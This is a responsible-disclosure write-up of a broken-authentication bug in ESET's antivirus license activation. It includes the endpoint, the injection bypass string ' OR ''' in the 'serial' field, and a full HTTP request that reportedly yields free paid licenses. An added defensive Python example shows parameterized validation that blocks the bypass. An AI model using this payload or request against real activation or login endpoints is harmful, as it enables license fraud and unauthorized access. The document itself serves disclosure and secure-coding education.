Filed in Write Ups
A Hilarious ESET Broken Authentication Vulnerability (one click free purchase)
Mohamed A. Baset

Hello Geeks and Security Evangelists,

My name is Mohamed Abdelbaset Elnoby, just another Senior Information Security Researcher and Web Application Pentester in the world :D. Today I would like to show you a “hilarious” Broken Authentication bug I found on the ESET website, specifically in their “Antivirus Product Activation Process”, that allowed me to generate millions of valid paid licenses of “ESET Nod32 Antivirus” (as per their description, “Our award-winning security software offers the most effective protection available today”) for free.
(Yes, “hilarious” is in bold; it’s not a formatting mistake, but you will know why at the end of the story.)

What is Broken Authentication?!

While most applications require authentication to gain access to private information or to execute tasks, not every authentication method can provide adequate security. Negligence, ignorance, or simple underestimation of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.

Besides, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.

Problems related to the authentication schema can be found at different stages of the software development life cycle (SDLC), like the design, development, and deployment phases:

  • In the design phase errors can include a wrong definition of application sections to be protected, the choice of not applying strong encryption protocols for securing the transmission of credentials, and many more.
  • In the development phase errors can include the incorrect implementation of input validation functionality or not following the security best practices for the specific language.
  • In the application deployment phase, there may be issues during the application setup (installation and configuration activities) due to a lack of required technical skills or due to a lack of good documentation.

Black Box testing:

There are several methods of bypassing the authentication schema that is used by a web application:

  • Direct page request (forced browsing)
  • Parameter modification
  • Session ID prediction
  • SQL injection

Here are the in-depth details:

[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ' OR '''
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--

Result!!

Each time you send the above request with the bypass string, guess what?! You will receive a free paid license of ESET Nod32 valid for 1 year!! (The yearly subscription actually costs $29.00 per user/request.)

[*] Proof of Concept Video:

What to do?!

All I needed to do was to create a detailed report and address this “catastrophic” bug under their Responsible Disclosure rules, which I already did. But what is the previously mentioned “hilarious” thing here?!! :v

[*] Screenshots are louder than speech 😀

Behind the Scene!!

As this is black-box testing and nothing interesting is printed as output, I can’t even predict what was happening in the back-end, but at least that’s a good thing for a bug hunter 😀. It may be a fully blind SQL injection, an authentication bypass, or simply a broken authentication issue (the last one is the most realistic), but what I’m sure of is that in a parallel world a programmer was having a lot of beer while handling the “if statement checks, input filtration, and database querying” and got drunk enough to be trapped by my bypass.

[*] Nothing to be said here but rules are rules and must be respected, Thanks Daniel but I will keep my sense of humor for my CV 😀

Conclusion…

For my dear programmer friends: don’t trust user-supplied inputs (“filter all the things”), stored procedures are safer, RTFM, and finally don’t drink beer while coding. Peace. 😀
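To make the advice concrete, here is an added example (my own code, not the author's and not anything from ESET's activation service) of how a product-activation endpoint can handle the "serial" field so that a bypass string like the one in the request dump above is treated as data, never as part of a query. The key format, the SQLite table and the sample keys are all assumptions constructed for the example; the real service's format and back-end are not described on this page.

```python
import re
import sqlite3

# Assumed key format for this example (NOT ESET's real format): four groups of
# four uppercase alphanumerics, e.g. AAAA-BBBB-CCCC-DDDD. Rejecting anything
# else up front means quotes, spaces and SQL keywords never reach the database.
SERIAL_RE = re.compile(r"^[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}$")


def build_license_db():
    """Constructed in-memory license table standing in for the vendor back-end."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE licenses ("
        " serial TEXT PRIMARY KEY,"
        " activated INTEGER NOT NULL DEFAULT 0)"
    )
    # Two sample keys, constructed for the example.
    conn.executemany(
        "INSERT INTO licenses (serial) VALUES (?)",
        [("AAAA-BBBB-CCCC-DDDD",), ("1111-2222-3333-4444",)],
    )
    conn.commit()
    return conn


def activate(conn, serial):
    """Validate the submitted key, look it up, and mark it used atomically.

    Returns a (granted, reason) pair. The serial is never spliced into SQL
    text: it must match the expected shape, and then it is handed to the
    driver as a bound parameter, so a value such as  ' OR '''  is simply a
    string that matches no stored key.
    """
    if not isinstance(serial, str):
        return False, "malformed serial"
    serial = serial.strip().upper()
    if SERIAL_RE.fullmatch(serial) is None:
        return False, "malformed serial"

    # Parameterized lookup: the driver quotes/escapes the value, not us.
    row = conn.execute(
        "SELECT activated FROM licenses WHERE serial = ?", (serial,)
    ).fetchone()
    if row is None:
        return False, "unknown serial"
    if row[0]:
        return False, "already activated"

    # Conditional update: if two requests race on the same key, only one
    # changes a row, so replaying the request cannot mint a second license.
    cur = conn.execute(
        "UPDATE licenses SET activated = 1 WHERE serial = ? AND activated = 0",
        (serial,),
    )
    conn.commit()
    if cur.rowcount != 1:
        return False, "already activated"
    return True, "activated"


if __name__ == "__main__":
    db = build_license_db()
    # The bypass string from the request dump above, and a valid sample key.
    for candidate in ["' OR '''", "AAAA-BBBB-CCCC-DDDD", "AAAA-BBBB-CCCC-DDDD"]:
        print(repr(candidate), "->", activate(db, candidate))
```

Two design points worth noting: the format check and the bound parameter are independent layers, so a missing or too-loose regex still leaves the query structure intact, and the conditional `UPDATE ... AND activated = 0` guards against the "send the same request again" pattern the write-up relies on, which a plain SELECT-then-UPDATE would not under concurrent requests.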


Have a good day, Gentlemen

References (OWASP wiki pages):

Broken Authentication and Session Management
Top 10 2013 – A2: Broken Authentication and Session Management
Testing for Bypassing Authentication Schema
